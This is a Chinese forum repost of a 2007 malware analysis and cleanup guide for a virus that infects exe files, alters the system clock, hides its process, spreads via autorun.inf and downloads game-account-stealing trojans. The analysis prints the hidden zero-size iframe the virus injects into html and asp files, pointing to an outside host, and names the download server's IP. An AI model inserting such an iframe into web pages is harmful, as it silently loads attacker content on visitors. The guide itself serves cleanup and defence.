http://www.mmswz.com/bbs1/dispbbs.asp?boardid=13&ID=3653
查找到如此資料,可據(jù)此清除病毒。但我覺得最好還是重裝系統(tǒng)了。
關(guān)于 修改系統(tǒng)時間 并感染exe成為番茄花園的病毒(rising.exe rising.eve)
2007-05-03 15:40
今天發(fā)現(xiàn)此種病毒求助者見多 收到樣本后 利馬測試了一下
該病毒就是前些日子流行的 修改系統(tǒng)時間的病毒之變種
此次變種可謂是集N種破壞性病毒之大成了
主要破壞功能有:1.感染exe 并使得被感染的exe的公司等屬性變?yōu)?番茄花園
2.感染html asp 等文件 插入惡意代碼
3.通過雙擊磁盤啟動
4.下載木馬,盜取網(wǎng)游帳號
5.修改注冊表 使系統(tǒng)無法顯示隱藏文件
6.通過hook API 函數(shù) 導(dǎo)致任務(wù)管理器中 無法看見其進(jìn)程
分析報告如下:
File: ising.exe
Size: 64775 bytes
File Version: 1.00
MD5: 86311B37D938BB35645E7B092014DD63
SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3
CRC32: 88ABBD9B
rising.exe 運行后 首先釋放一個rising.eve的文件 然后由rising.exe啟動他
之后 釋放139CA82A.EXE 139CA82A.dll(隨機(jī)的8個數(shù)字字母組合成的文件名)到系統(tǒng)文件夾
注冊服務(wù)139CA82A.EXE
139CA82A.EXE控制winlogon進(jìn)程 使得139CA82A.dll插入幾乎所有進(jìn)程
釋放rising.exe 和autorun.inf 到每個分區(qū) 使得雙擊磁盤啟動
感染 除系統(tǒng)分區(qū)外的某個分區(qū)的exe文件 使得其公司名全變?yōu)?番茄花園
感染 html asp 等文件 在其后面插入代碼
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>
修改系統(tǒng)時間 隨機(jī)把年份往前調(diào) 月,日不變
修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue:
值為 0x00000000
導(dǎo)致無法顯示臨時文件
rising.exe 還會hook 多個 API函數(shù) 使其進(jìn)程在任務(wù)管理器中隱藏
使用Explorer.exe連接網(wǎng)絡(luò) 61.152.92.98:80下載木馬
下載的木馬一般為K117815XXXXX.exe
XXXXX代表隨機(jī)
到系統(tǒng)文件夾
由于 每臺機(jī)器上下載的木馬的名稱不同 但最后結(jié)果相同 所以中間釋放的過程省略
最后 這些木馬運行后分別釋放了如下文件
C:\WINDOWS\system32\buchehuo.exe(創(chuàng)建了服務(wù)inetsvr)
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
臨時文件夾下 釋放upxdnd.exe和upxdnd.dll
解決辦法:
安全模式下(開機(jī)后不斷 按F8鍵 然后出來一個高級菜單 選擇第一項 安全模式 進(jìn)入系統(tǒng))
首先把系統(tǒng)日期 改回來
然后打開sreng
啟動項目 注冊表 刪除如下項目
<upxdnd><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<cmdbs><C:\WINDOWS\cmdbs.exe> []
<mppds><C:\WINDOWS\mppds.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<winform><C:\WINDOWS\winform.exe> []
“啟動項目”-“服務(wù)”-“Win32服務(wù)應(yīng)用程序”中點“隱藏經(jīng)認(rèn)證的微軟項目”,
選中以下項目,點“刪除服務(wù)”,再點“設(shè)置”,在彈出的框中點“否”:
139CA82A / 139CA82A
Wireless Zero Conflguration / inetsvr
把下面的 代碼拷入記事本中然后另存為1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
雙擊1.reg把這個注冊表項導(dǎo)入
然后雙擊我的電腦-工具-文件夾選項-查看-顯示所有文件和文件夾,把“隱藏受保護(hù)的系統(tǒng)文件”的勾去掉。
右鍵 點擊C盤 點擊右鍵菜單中的“打開”打開C盤 (千萬不要雙擊)(如圖)
刪除 如下文件
C:\rising.exe
C:\autorun.inf
C:\WINDOWS\system32\buchehuo.exe
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
C:\WINDOWS\unspapik.txt
C:\WINDOWS\wiasevct.txt
C:\WINDOWS\wiasvctr.txt
C:\WINDOWS\ganran.txt
C:\WINDOWS\system32\139CA82A.DLL(隨機(jī)的8個數(shù)字字母組合成的文件名)
C:\WINDOWS\system32\139CA82A.EXE(隨機(jī)的8個數(shù)字字母組合成的文件名)
C:\WINDOWS\system32\K117815XXXXX.exe(XXXXX代表隨機(jī)數(shù)字)
清空C:\Documents and Settings\用戶名\Local Settings\Temp
右鍵 點擊分別打開系統(tǒng)分區(qū)以外的分區(qū) 還是點擊右鍵菜單中的“打開” (千萬不要雙擊)
刪除每個分區(qū)下面的autorun.inf和rising.exe文件
由于殺毒軟件還不能認(rèn)出這個病毒所以還是暫時不要點擊 受感染的exe 和html,asp文件
據(jù)說ClamWin Free Antivirus這個殺毒軟件能查殺這種病毒,我沒試過,也許行,不妨試試。
這個殺毒軟件是英文版的,沒有中文版。如果使用,記得先把原有的殺毒軟件卸載掉,然后安裝新的。注意應(yīng)該是在安全模式下查殺病毒。
軟件介紹:ClamWin是一套功能非常優(yōu)秀的免費防毒軟件。它的體積非常嬌小,不會占用太多計算機(jī)資源,不像其它防毒軟件安裝之后會拖累整臺計算機(jī)的速度。而且除了強(qiáng)大的文件與電子郵件防護(hù)能力之外,它還擁有排程掃描、在線更新病毒碼、及時偵測等功能,和市面上知名防毒軟件比起來一點也不遜色!<script language="javascript" src="../newhuagg/js_ad_show_8.js"></script>
下載頁面:http://www.onlinedown.net/soft/44149.htm
SRENG是指System Repair Engineer,官方網(wǎng)站:http://www.kztechs.com/index1.html
軟件直接下載:http://download.kztechs.com/files/sreng2.zip
介紹和說明:http://www.pxue.com/Html/893.html